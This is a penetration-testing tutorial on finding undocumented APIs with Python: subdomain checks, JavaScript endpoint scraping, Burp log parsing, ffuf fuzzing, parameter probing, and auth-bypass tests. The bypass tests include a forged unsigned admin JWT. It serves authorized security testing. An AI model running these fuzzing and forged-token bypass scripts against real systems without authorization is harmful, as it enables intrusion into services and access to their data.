Shadow API discovery is a critical phase in modern penetration testing, moving beyond officially documented endpoints to uncover hidden or unadvertised API surfaces. This isn't about parsing an OpenAPI spec; it's about active reconnaissance and traffic analysis to expose APIs not meant for public consumption or those residing on overlooked subdomains. Python, with its robust HTTP libraries, regular expression capabilities, and automation potential, serves as an invaluable asset in this hunt, transforming tedious manual analysis into repeatable, scalable scripts.
Initial Foothold: Passive Recon for API Leads
Before hitting targets with active requests, gather intelligence passively. Identifying subdomains often reveals internal-facing applications or forgotten API gateways. Similarly, static assets like JavaScript files frequently contain hardcoded API paths that aren't immediately obvious from network traffic.
Subdomain Enumeration for API Gateways
Tools like subfinder or assetfinder efficiently enumerate subdomains. The output from these tools can then be piped into a Python script for further analysis, particularly looking for keywords like api, dev, test, or specific product names. We're sifting for domains that might host API instances rather than user-facing web applications.
subfinder -d example.com -silent | tee subdomains.txt
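Before sending a single request, a quick keyword sift over the subfinder output can prioritize likely API hosts. A minimal sketch, assuming a `subdomains.txt`-style list as input; the keyword list is illustrative, so extend it with target-specific terms:

```python
# Sift subdomains for API-suggestive keywords before any active probing.
# The keyword list is illustrative -- extend it with product names and
# other target-specific terms from recon.
API_KEYWORDS = ("api", "dev", "test", "staging", "internal", "gateway")

def filter_api_candidates(subdomains):
    """Return subdomains whose DNS labels contain any API-suggestive keyword."""
    candidates = []
    for sub in subdomains:
        labels = sub.lower().split(".")
        if any(kw in label for kw in API_KEYWORDS for label in labels):
            candidates.append(sub)
    return candidates

if __name__ == "__main__":
    subs = ["api.example.com", "www.example.com", "dev-gateway.example.com"]
    print(filter_api_candidates(subs))
```

In practice you would feed the filtered list straight into the status checker below, so dead or clearly user-facing hosts never consume request budget.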
Once you have a list of subdomains, a quick Python script can perform HTTP status checks and categorize them. This helps prune non-responsive or irrelevant hosts before deeper dives.
import requests
import sys
from concurrent.futures import ThreadPoolExecutor

def check_subdomain(subdomain):
    url = f"http://{subdomain}"
    try:
        response = requests.get(url, timeout=5, allow_redirects=True)
        print(f"[+] {url} - Status: {response.status_code}")
        return url, response.status_code
    except requests.exceptions.RequestException as e:
        # print(f"[-] {url} - Error: {e}")  # Uncomment for verbose errors
        return url, None

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python subdomain_checker.py <subdomains_file.txt>")
        sys.exit(1)
    subdomains_file = sys.argv[1]
    with open(subdomains_file, 'r') as f:
        subdomains = [line.strip() for line in f if line.strip()]
    print(f"Checking {len(subdomains)} subdomains...")
    with ThreadPoolExecutor(max_workers=20) as executor:
        results = list(executor.map(check_subdomain, subdomains))
    # Optional: further processing of results, e.g., keeping only 200s
JavaScript Scrutiny for Hidden Endpoints
JavaScript files are a goldmine for undocumented API endpoints. Developers often hardcode paths, sensitive strings, or even full API schemas within client-side code. After identifying JavaScript files from crawled pages or identified subdomains, fetch them and apply regular expressions to extract potential API paths.
Tools like waybackurls or gau (getallurls; go install github.com/lc/gau@latest) can quickly pull historical URLs, including JS files, associated with a domain. We'll then use Python to automate fetching and scanning these scripts.
gau example.com | grep '\.js$' | tee js_files.txt
import requests
import re
import sys
from concurrent.futures import ThreadPoolExecutor

# Regex patterns for common API endpoint structures
# Examples: /api/v1/users, /service/v1/resource, /users/create
API_PATTERNS = [
    re.compile(r'/(?:api|v\d+)/[a-zA-Z0-9_\-/]+'),
    re.compile(r'/[a-zA-Z0-9_\-]+/v\d+/[a-zA-Z0-9_\-/]+'),  # e.g., /service/v1/resource
    re.compile(r'/[a-zA-Z0-9_\-]+/(?:create|read|update|delete|get|post|put|patch|info|data)'),  # common actions
    re.compile(r'"(?:/api|/v\d+|/[a-zA-Z0-9_\-]+/(?:api|v\d+))/[a-zA-Z0-9_\-/]+\b"')  # paths in quotes
]

def fetch_and_scan_js(js_url):
    try:
        response = requests.get(js_url, timeout=10)
        if response.status_code == 200 and 'javascript' in response.headers.get('Content-Type', ''):
            print(f"[+] Processing JS: {js_url}")
            found_endpoints = set()
            for pattern in API_PATTERNS:
                for match in pattern.finditer(response.text):
                    endpoint = match.group(0).strip('"')  # drop quotes from the quoted-path pattern
                    if endpoint.startswith('/') and len(endpoint) > 2:  # basic sanity check
                        found_endpoints.add(endpoint)
            return list(found_endpoints)
        # else: non-200 status or not a JavaScript response; skip silently
    except requests.exceptions.RequestException:
        pass  # print(f"[-] Error fetching {js_url}")  # Uncomment for verbose errors
    return []

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python js_scanner.py <js_urls_file.txt>")
        sys.exit(1)
    js_urls_file = sys.argv[1]
    with open(js_urls_file, 'r') as f:
        js_urls = [line.strip() for line in f if line.strip()]
    print(f"Scanning {len(js_urls)} JavaScript files for API endpoints...")
    all_discovered_endpoints = set()
    with ThreadPoolExecutor(max_workers=10) as executor:
        for endpoints_list in executor.map(fetch_and_scan_js, js_urls):
            all_discovered_endpoints.update(endpoints_list)
    print("\n--- Discovered API Endpoints ---")
    for ep in sorted(all_discovered_endpoints):
        print(ep)
Active Analysis: Intercepting and Deciphering Traffic
Passive reconnaissance provides leads; active traffic analysis confirms and expands them. Proxy tools are indispensable here, but raw proxy logs quickly become unmanageable. Python can process these logs efficiently.
Proxying with a Purpose (Burp Suite)
Route all browser traffic, mobile app traffic, or even command-line tool traffic through Burp Suite. This captures every HTTP request and response. The crucial part is not just capturing, but observing patterns. Look for:
- Requests to non-standard ports or subdomains.
- JSON or XML request/response bodies.
- Authorization headers (Bearer tokens, API keys).
- Unusual HTTP methods (PATCH, PROPFIND).
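Those heuristics can be encoded as a rough triage score over each captured request, so the interesting entries float to the top of a large history. The dict layout below (method/url/headers) is a convention for this sketch, not any proxy's native export format:

```python
# Rough triage scoring for a captured HTTP request, encoding the
# heuristics above: unusual verbs, auth headers, structured bodies,
# and explicit (possibly non-standard) ports. Higher score = more
# API-like. The input dict layout is this sketch's own convention.
COMMON_METHODS = {"GET", "POST", "HEAD", "OPTIONS"}

def api_likelihood(req):
    """Score how API-like a captured request looks."""
    score = 0
    if req["method"].upper() not in COMMON_METHODS:
        score += 2  # unusual verbs like PATCH or PROPFIND
    headers = {k.lower(): v for k, v in req["headers"].items()}
    if "authorization" in headers or "x-api-key" in headers:
        score += 2  # Bearer tokens / API keys
    content_type = headers.get("content-type", "").lower()
    if "json" in content_type or "xml" in content_type:
        score += 1  # structured request bodies
    host = req["url"].split("//", 1)[-1].split("/", 1)[0]
    if ":" in host:
        score += 1  # explicit port in the host portion
    return score

if __name__ == "__main__":
    sample = {
        "method": "PATCH",
        "url": "https://internal.example.com:8443/v2/users/42",
        "headers": {"Authorization": "Bearer abc", "Content-Type": "application/json"},
    }
    print(api_likelihood(sample))  # every heuristic fires here
```

Sorting a parsed proxy history by this score is a cheap way to decide which requests deserve manual replay first.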
Exporting Burp's HTTP history, typically in XML format, allows for programmatic analysis. While Burp offers extensions for deeper analysis, external Python scripting gives more flexibility and integration with other custom tools.
# Manual steps in Burp Suite:
# 1. Proxy -> HTTP history
# 2. Right-click anywhere in the history table -> "Save item" -> "All items"
# 3. Choose a file name (e.g., burp_history.xml)
Programmatic Traffic Analysis with Python
Once Burp history is exported, Python can parse the XML and extract interesting data. We're looking for unique endpoints, parameters, and headers that signal API interaction. The xml.etree.ElementTree module is standard for XML parsing in Python.
import base64
import re
import sys
import xml.etree.ElementTree as ET
from urllib.parse import urlparse, parse_qs

def analyze_burp_history(xml_file):
    tree = ET.parse(xml_file)
    root = tree.getroot()
    discovered_endpoints = set()
    discovered_parameters = set()
    print(f"Analyzing Burp Suite history from {xml_file}...")
    for item in root.findall('item'):
        host = item.find('host').text
        port = item.find('port').text
        protocol = item.find('protocol').text
        full_url = item.find('url').text  # full URL from Burp
        parsed_url = urlparse(full_url)
        path = parsed_url.path
        query_params = parse_qs(parsed_url.query)
        full_endpoint = f"{protocol}://{host}:{port}{path}"
        discovered_endpoints.add(full_endpoint)
        for param_name in query_params:
            discovered_parameters.add(param_name)
        # Look for parameters in request bodies if available
        request_base64 = item.find('request').text
        if request_base64:
            # Burp's request/response elements are Base64 encoded by default
            try:
                decoded_request = base64.b64decode(request_base64).decode('utf-8', errors='ignore')
                # Simple regex for common body parameter patterns (key=value or "key":"value")
                body_params = re.findall(r'[a-zA-Z0-9_\-]+=[^&\s]+|"[a-zA-Z0-9_\-]+":"[^"]+"', decoded_request)
                for param in body_params:
                    # Extract just the key part
                    if '=' in param:
                        discovered_parameters.add(param.split('=')[0])
                    elif ':' in param:
                        discovered_parameters.add(param.split(':')[0].strip('"'))
            except Exception:
                pass  # skip malformed Base64 payloads
    print("\n--- Unique Discovered Endpoints ---")
    for ep in sorted(discovered_endpoints):
        print(ep)
    print("\n--- Unique Discovered Parameters ---")
    for param in sorted(discovered_parameters):
        print(param)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python burp_parser.py <burp_history.xml>")
        sys.exit(1)
    analyze_burp_history(sys.argv[1])
Probing the Unknown: Fuzzing for Shadow Endpoints
Even after extensive passive and active analysis, many API endpoints remain hidden. These often follow predictable patterns but are simply not linked or referenced. Fuzzing with intelligent wordlists becomes crucial here.
Intelligent Wordlist Generation
Generic wordlists are a start, but custom, target-specific wordlists are far more effective. The previously extracted parameters and common API keywords (user, admin, v1, auth, dashboard, report) are excellent seeds. Combine these with common HTTP verbs and known API conventions to generate targeted lists.
import itertools

def generate_api_wordlist(base_paths, common_terms, versions):
    wordlist = set()
    # Base paths combined with common terms, with and without version segments
    for path in base_paths:
        for term in common_terms:
            wordlist.add(f"{path}/{term}")
            for ver in versions:
                wordlist.add(f"{path}/{ver}/{term}")
    # Pairwise combinations of terms, optionally versioned
    for first, second in itertools.permutations(common_terms, 2):
        wordlist.add(f"/{first}/{second}")
        for ver in versions:
            wordlist.add(f"/{ver}/{first}/{second}")
    # Common API route segments directly
    for term in common_terms:
        wordlist.add(f"/api/{term}")
        wordlist.add(f"/{term}s")  # naive plural forms
        for ver in versions:
            wordlist.add(f"/api/{ver}/{term}")
            wordlist.add(f"/{ver}/{term}")
    return sorted(wordlist)

if __name__ == "__main__":
    base_paths_discovered = ["/api", "/admin", "/service"]  # from prior recon
    common_api_terms = ["users", "products", "orders", "auth", "login", "register", "status", "data", "report", "config"]
    api_versions = ["v1", "v2", "v3", "alpha", "beta"]
    custom_wordlist = generate_api_wordlist(base_paths_discovered, common_api_terms, api_versions)
    with open("custom_api_wordlist.txt", "w") as f:
        for item in custom_wordlist:
            f.write(item + "\n")
    print(f"Generated custom API wordlist with {len(custom_wordlist)} entries: custom_api_wordlist.txt")
    # Example entries from the generated list
    print("\nExample entries:")
    for entry in custom_wordlist[:10]:
        print(entry)
Targeted Endpoint Fuzzing with ffuf and Python
ffuf is an incredibly fast fuzzer ideal for discovering hidden endpoints. Pair it with the custom wordlists generated above. Focus on common API prefixes like /api/, /v1/, or subdomains identified as potential API gateways.
# Example ffuf command targeting a base API path
# -w: wordlist
# -u: URL with the FUZZ keyword (the wordlist entries already start
#     with "/", so FUZZ sits directly after the hostname)
# -H: add a header (e.g., Content-Type for JSON APIs)
# -mc: match status codes (200, 401, 403, 500 can all indicate API presence)
# -fs: filter response sizes (e.g., ignore known 404-page sizes)
# Optional extras: -recursion / -recursion-depth to fuzz discovered
# directories again (useful but noisy), -ac to auto-calibrate filtering
ffuf -w custom_api_wordlist.txt -u https://api.example.comFUZZ -H "Content-Type: application/json" -mc 200,401,403,500 -fs 1234,4567 -o api_fuzz_results.json -of json
The -of json flag for ffuf makes output parsing straightforward. A Python script can then ingest these results, filter out noise, and identify unique, responsive endpoints. Focus on non-404/non-302 responses that don't match typical static asset sizes or known error page sizes.
import json
import sys

def parse_ffuf_results(json_file):
    discovered_endpoints = set()
    with open(json_file, 'r') as f:
        data = json.load(f)
    print(f"Parsing ffuf results from {json_file}...")
    for result in data['results']:
        url = result['url']
        status_code = result['status']
        length = result['length']
        # Heuristic: filter out 404/302-like responses by status and/or size.
        # Adjust 'known_404_sizes' to your target's typical error-page sizes.
        known_404_sizes = {1234, 4567, 8910}  # example sizes to filter
        if status_code not in {404, 302} and length not in known_404_sizes:
            discovered_endpoints.add(url)
            # Optionally print more details:
            # print(f"Found: {url} (Status: {status_code}, Size: {length})")
    print("\n--- Fuzzed Discovered API Endpoints ---")
    for ep in sorted(discovered_endpoints):
        print(ep)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python ffuf_parser.py <ffuf_output.json>")
        sys.exit(1)
    parse_ffuf_results(sys.argv[1])
Beyond Discovery: Parameter and Authentication Nuances
Uncovering Hidden Parameters
Discovering an endpoint is only half the battle: many endpoints accept undocumented parameters. Once an endpoint is identified, probe it with common API parameter names (e.g., id, user_id, token, callback, format, debug) across different HTTP methods. Python's requests library makes this trivial, allowing rapid iteration through candidate parameters and values.
import requests

def test_parameters(endpoint, common_params, headers=None):
    print(f"Testing parameters for: {endpoint}")
    found_params = []
    for param in common_params:
        # Test with a GET request
        try:
            params = {param: "testvalue"}
            response = requests.get(endpoint, params=params, headers=headers, timeout=5)
            if response.status_code not in {400, 404}:  # look for non-explicit errors
                print(f"  [+] GET with '{param}' (Status: {response.status_code})")
                found_params.append(param)
        except requests.exceptions.RequestException:
            pass
        # Test with a POST request (if the endpoint might accept POST)
        try:
            data = {param: "testvalue"}
            response = requests.post(endpoint, json=data, headers=headers, timeout=5)
            if response.status_code not in {400, 404}:
                print(f"  [+] POST with '{param}' (Status: {response.status_code})")
                if param not in found_params:
                    found_params.append(param)
        except requests.exceptions.RequestException:
            pass
    return found_params

if __name__ == "__main__":
    target_endpoint = "https://api.example.com/v1/users"  # example from earlier discovery
    common_api_parameters = ["id", "user_id", "name", "email", "query", "limit", "offset",
                             "callback", "debug", "version", "sort_by", "filter"]
    # Example headers (e.g., if you have a known API key or JWT):
    # auth_headers = {"Authorization": "Bearer YOUR_TOKEN_HERE"}
    auth_headers = None  # start without auth if unknown
    discovered = test_parameters(target_endpoint, common_api_parameters, auth_headers)
    if discovered:
        print(f"\nDiscovered parameters for {target_endpoint}: {', '.join(discovered)}")
    else:
        print(f"\nNo new parameters discovered for {target_endpoint}.")
Scripted Auth Testing
Shadow APIs often have weaker or misconfigured authentication. Once an API is discovered, Python scripts can be used to test various authentication bypasses: no authentication, invalid tokens, default credentials, or even iterating through common weak JWTs. This requires a targeted approach for each discovered API, potentially chaining with previously found authorization headers or cookies.
import requests

def test_auth_bypass(endpoint, method="GET", json_data=None, headers=None):
    print(f"Testing auth bypass for {method} {endpoint}")
    try:
        if method.upper() == "GET":
            response = requests.get(endpoint, headers=headers, timeout=7)
        elif method.upper() == "POST":
            response = requests.post(endpoint, json=json_data, headers=headers, timeout=7)
        else:
            print(f"Unsupported method: {method}")
            return
        print(f"  [+] Status: {response.status_code}")
        print(f"  [+] Response snippet: {response.text[:200]}...")  # first 200 chars
        if response.status_code == 200:
            print("  [!!!] Potential bypass: 200 OK without expected authentication.")
        elif response.status_code == 401:
            print("  [-] Authentication required (401 Unauthorized).")
        elif response.status_code == 403:
            print("  [-] Forbidden (403 Forbidden).")
    except requests.exceptions.RequestException as e:
        print(f"  [-] Request error: {e}")

if __name__ == "__main__":
    sensitive_endpoint = "https://api.example.com/v1/admin/users"  # found admin endpoint
    print("--- Testing without any authentication ---")
    test_auth_bypass(sensitive_endpoint, method="GET")
    print("\n--- Testing with a potentially invalid/expired token ---")
    invalid_headers = {"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.invalid.signature"}
    test_auth_bypass(sensitive_endpoint, method="GET", headers=invalid_headers)
    # Example of testing a POST endpoint if relevant:
    # post_data = {"action": "list_all_users"}
    # print("\n--- Testing POST with a potentially invalid token ---")
    # test_auth_bypass(sensitive_endpoint, method="POST", json_data=post_data, headers=invalid_headers)
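The "common weak JWTs" angle can be prototyped with the standard library alone. One cheap probe is an alg: none token: correctly configured verifiers reject it outright, but a misconfigured shadow API might not. A minimal sketch, with illustrative claims, whose output can be fed into test_auth_bypass above:

```python
import base64
import json

def b64url(raw: bytes) -> str:
    # JWT segments use unpadded base64url encoding
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def make_unsigned_jwt(payload: dict) -> str:
    """Forge an 'alg: none' JWT with an empty signature segment.

    A correct verifier rejects this outright; a misconfigured shadow
    API might not, which makes it a cheap one-request probe.
    """
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    return f"{header}.{body}."  # trailing dot = empty signature

if __name__ == "__main__":
    # The claims below are illustrative, not from any real target
    token = make_unsigned_jwt({"sub": "admin", "role": "admin"})
    forged_headers = {"Authorization": f"Bearer {token}"}
    print(forged_headers["Authorization"])
    # Pass forged_headers as the headers= argument of test_auth_bypass
```

A 200 OK against a forged token is the same high-signal finding as the no-auth case: it means the endpoint never validates the signature at all.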